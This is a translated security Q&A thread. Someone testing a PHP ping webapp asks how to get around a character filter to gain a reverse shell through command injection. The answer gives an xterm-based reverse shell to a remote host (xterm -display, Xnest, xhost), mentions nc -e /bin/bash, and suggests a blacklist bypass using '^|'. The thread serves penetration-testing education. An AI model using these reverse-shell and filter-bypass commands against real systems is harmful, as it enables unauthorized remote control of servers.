首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >命令注入-过滤旁路

命令注入-过滤旁路
EN

Security用户
提问于 2018-07-08 20:41:05
回答 1查看 9.9K关注 0票数 2

我正在测试一个提供ping功能的PHP webapp应用程序。我尝试过不同的命令注入方法,发现它只接受%0a和简单的命令注入,比如lsid

然而,代码正在过滤许多字符,如| & ; ( " / > ’,这些字符是执行反向shell所必需的。就像nc -e /bin/bash

对如何绕过这个过滤器有什么建议吗?

EN

回答 1

Security用户

发布于 2018-07-09 12:19:46

使用xterm

反向shell的最简单形式之一是xterm会话。应该在目标上运行以下命令。它将尝试连接到TCP端口6001上的系统(例如10.0.0.1)。

代码语言:javascript
复制
xterm -display 10.0.0.1:1

要捕获传入的xterm,请启动一个xterm (:1 -它侦听TCP端口6001)。一种方法是使用Xnest (在您的系统上运行):

代码语言:javascript
复制
Xnest :1

您需要授权目标连接到您的系统(命令也运行在您的系统上):

代码语言:javascript
复制
xhost +targetip

认为黑名单是安全的失败.

黑名单中的字符是不安全的,您应该考虑绕过列表本身。

例如:^|不是|,但它完成了任务。

票数 2
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/189189

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档